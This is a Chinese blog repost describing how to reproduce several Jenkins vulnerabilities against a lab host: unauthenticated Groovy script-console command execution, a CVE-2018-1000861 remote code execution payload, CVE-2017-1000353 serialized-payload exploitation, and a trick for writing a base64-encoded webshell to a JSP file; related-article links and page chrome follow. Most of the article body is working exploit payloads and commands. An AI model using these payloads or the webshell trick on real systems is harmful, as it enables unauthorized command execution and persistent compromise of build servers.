Jenkins漏洞利用复现

最新推荐文章于 2024-05-31 11:19:49 发布
最新推荐文章于 2024-05-31 11:19:49 发布
阅读量781 收藏 1
点赞数
文章标签: 运维 python shell
原文链接:http://www.cnblogs.com/junsec/p/11593556.html
版权

一、未授权访问

访问url:

http://172.16.20.134:8080/script

 

 

 

命令执行

println "ls -al".execute().text

也可以利用powershell 或者python脚本反弹shell

 

 

 

二、CVE-2018-1000861 远程命令执行漏洞

payload:

securityRealm/user/admin/descriptorByName/org.jenkinsci.plugins.scriptsecurity.sandbox.groovy.SecureGroovyScript/checkScript
?sandbox=true
&value=public class x {
  public x(){
    "touch /tmp/success".execute()
  }
}

  

 

&value=转成url编码

发送get请求:

 

python脚本:

https://github.com/orangetw/awesome-jenkins-rce-2019/blob/master/exp.py

  

 

三、CVE-2017-1000353 远程代码执行

工具地址:https://github.com/vulhub/CVE-2017-1000353

 https://ssd-disclosure.com/archives/3171

# 生成ser
java -jar CVE-2017-1000353-1.1-SNAPSHOT-all.jar 1.ser "touch /tmp/1.jsp"

# 发送ser
python exploit.py http://172.16.20.134:8080 1.ser

 

exploit.py这里要注释下,如果你使用代理的话可以添加,这里只是复现,用不到

 另外一个linux写shell的小技巧:

echo base64后的木马内容 |base64 -d > 1.jsp

 

jsp生成成功

 

 

四、

 

转载于:https://www.cnblogs.com/junsec/p/11593556.html

weixin_30564901
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
Dedecms 最新版漏洞收集并复现学习
墨痕诉清风的博客
09-30 5443
在用户密码重置功能处,php存在弱类型比较,导致如果用户没有设置密保问题的情况下可以绕过验证密保问题,直接修改密码(管理员账户默认不设置密保问题)。这么一次过滤,直接粗暴的将一些特殊字符替换为空,那么我们就可以通过特殊字符绕过上面的全局文件名不能包含php字符的限制,比如文件名为。这样,由于index.php中我们可以控制返回一个输入值和这个输入值经过服务器处理后的md5值。我们可以看到当uid存在值时就会进入我们现在的代码中,当cookie中的last_vid中不存在值为空时,就会将uid值赋予过去,
Active Directory 域服务权限提升漏洞(CVE-2022-26923)
做自己喜欢的事,并将其发挥到极致!
05-17 2773
文章目录声明一、漏洞描述二、影响范围三、Windows Active Directory (AD)四、Active Directory 证书服务五、环境配置六、漏洞复现七、修复方案八、参考链接 声明 本文章仅用于技术学习、安全研究。切勿用于非授权下渗透攻击行为,切记! 一、漏洞描述 Active Directory 域权限提升漏洞 (CVE-2022-26923)允许低权限用户在安装了 Active Directory 证书服务 (AD CS) 服务器角色的默认 Active Directory 环境中
【护网必备】Jenkins综合漏洞的利用工具
最新发布
Fly_鹏程万里
05-31 381
CVE-2015-8103/CVE-2016-0788 Jenkins 反序列化远程代码执行 https://github.com/Medicean/VulApps/tree/master/j/jenkins/1。CVE-2024-23897 Jenkins CLI 接口任意文件读取漏洞 https://github.com/vulhub/vulhub/blob/master/jenkins/CVE-2024-23897。本开源工具是由作者按照开源许可证发布的,仅供个人学习和研究使用。
HVV爆火漏洞:最新 WPS RCE (远程命令执行) 复现
Innocence_0的博客
10-28 138
最近HVV爆出的很火的WPS命令执行漏洞,其实并不是0DAY,早在2019年就出现了,只不过最近EXP才公开。接下来我们来复现一遍。
Laravel 远程代码执行漏洞(CVE-2021-3129)复现
oiadkt的博客
04-24 5311
Laravel 远程代码执行漏洞(CVE-2021-3129)
CVE-2021-41773漏洞复现
Aquarius_ego的博客
03-24 1385
CVE-2021-41773漏洞复现
jenkins老版本资源
11-09
这个压缩包文件集合提供了 Jenkins 的老版本及其相关资源,这对于那些需要维护旧项目或者希望在特定环境中复现旧版本行为的开发者来说非常有价值。 1. Jenkins 老版本的重要性:Jenkins 的每个版本都有可能包含新的...
CVE-2019-1003000 Jenkins-PreAuth-RCE 复现过程1
08-04
复现这个漏洞需要对Java、Jenkins和网络请求有深入的理解。在实际环境中,必须及时修复此类漏洞,以防止潜在的攻击。同时,对于Jenkins管理员来说,保持系统更新和配置安全策略至关重要,例如限制对敏感接口的访问,...
content-jenkins-java-project
03-09
总结来说,"content-jenkins-java-project"是一个结合了Java编程和Jenkins持续集成的实践案例,展示了如何利用Jenkins自动化Java项目的构建和测试过程,从而提高开发效率和软件质量。理解和掌握这个项目,有助于深入...
GitHack-master.rar
01-06
5. **Git漏洞利用与防护**:可能包含了关于已知Git漏洞的信息,例如CVE-2021-21300,这是一个允许攻击者通过恶意的Git钩子脚本执行任意代码的漏洞。了解这些漏洞可以帮助我们增强仓库的安全性。 6. **Git forensics...
python项目
02-09
Python在这些领域有广泛应用,例如编写扫描工具、漏洞利用程序、网络嗅探器等。项目可能使用了如Scapy、requests、BeautifulSoup等库来处理网络通信和数据解析。 总结来说,"python-project-master"是一个可能涵盖...
cve-2022-26134漏洞复现_实战_Confluence最新rce漏洞
恒安嘉新66的博客
06-11 3401
Confluence最新rce漏洞cve-2022-26134漏洞复现,有时拿下Confluence比拿下域控还有用,本次存在OGNL 注入rce漏洞,这次漏洞范围几乎通杀。
kaminsky 漏洞复现
weixin_48306934的博客
02-24 916
0x00 写在前面 笔者实现主要参考0x04部分参考资料(1),该参考资料是笔者在做博客时找到的唯一一篇kaminsky的复现博客(大多数博主注重讲原理而不注重实现),实现过程写的还是比较详尽的,但由于原文将原理和实现过程割裂开来,一是使得kaminsky的实现过程与原理缺少对应性,使得读者尽管实现但是难以对应原理的理解;二是很多细节没有被强调,没有具体说明操作的原因和重点,导致笔者实际实现过程中出现了很多不必要的错误,笔者不希望更多学习kaminsky的学习者们在复现时再次浪费不必要的时间,甚至因为小细节
CVE-2022-30190 漏洞复现
weixin_53884648的博客
11-10 5971
通过exp实现了对微软目前存在的office-word-2016的成功复现
Weblogic SSRF漏洞复现
bring_coco的博客
03-24 334
漏洞介绍 漏洞描述 Weblogic的http://yourip:7001/uddiexplorer/SearchPublicRegistries.jsp中由于服务器端没有对用户请求做出严格的过滤及限制,导致其可以从其他服务器获取一定的信息存在SSRF漏洞,利用该漏洞可以发送任意的HTTP请求,进而探测内网的redis,fastcgi等脆弱组件 影响版本 10.0.2.0 10.3.6.0 漏洞利用 环境:vulhub(ip:192.168.188.130) 1.开启该环境后访问http://your-i
Apache Druid RCE漏洞复现(QVD-2023-9629)
0xSec
04-26 4365
在Apache Druid使用Apache Kafka加载数据的场景下,未经身份认证的远程攻击者可配置Kafka连接属性,从而利用CVE-2023-25194漏洞触发JNDI注入,最终执行任意代码。
03 - CVE-2019-14287漏洞复现
weixin_43586169的博客
03-29 1093
一个简单的Linux系统的CVE漏洞
漏洞复现--SysAid On-premise远程代码执行(CVE-2023-47246)
qq_53003652的博客
12-18 972
SysAid On-premise 提供了诸如故障报告、资产管理、服务台支持、自动化流程等功能,以帮助 IT 团队更高效地工作。这种部署模式可以满足那些对数据安全性有更高要求的组织,同时也提供了更多的自定义和控制能力,以适应特定的业务需求和流程。该产品存在远程代码执行。
漏洞学习篇:CVE漏洞复现
ZL_1618的博客
12-26 848
攻击者可以使用路径遍历攻击将 URL 映射到由类似别名的指令配置的目录之外的文件。如果这些目录之外的文件不受通常的默认配置 “要求全部拒绝” 的保护,则这些请求可能会成功。1、200份很多已经买不到的绝版电子书 2、30G安全大厂内部的视频资料 3、100份src文档 4、常见安全面试题 5、ctf大赛经典题目解析 6、全套工具包 7、应急响应笔记 8、网络安全学习路线。Apache HTTP Server 是 Apache 基础开放的流行的 HTTP 服务器。可以看见,apache是49版本的。
jenkins 漏洞如何排查
02-01
1. 定期更新Jenkins和插件:及时更新Jenkins和其插件是防止漏洞利用的重要步骤。Jenkins官方会发布安全更新,你可以通过Jenkins的管理界面或者命令行工具进行更新。 2. 审查Jenkins日志:Jenkins会生成详细的日志...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值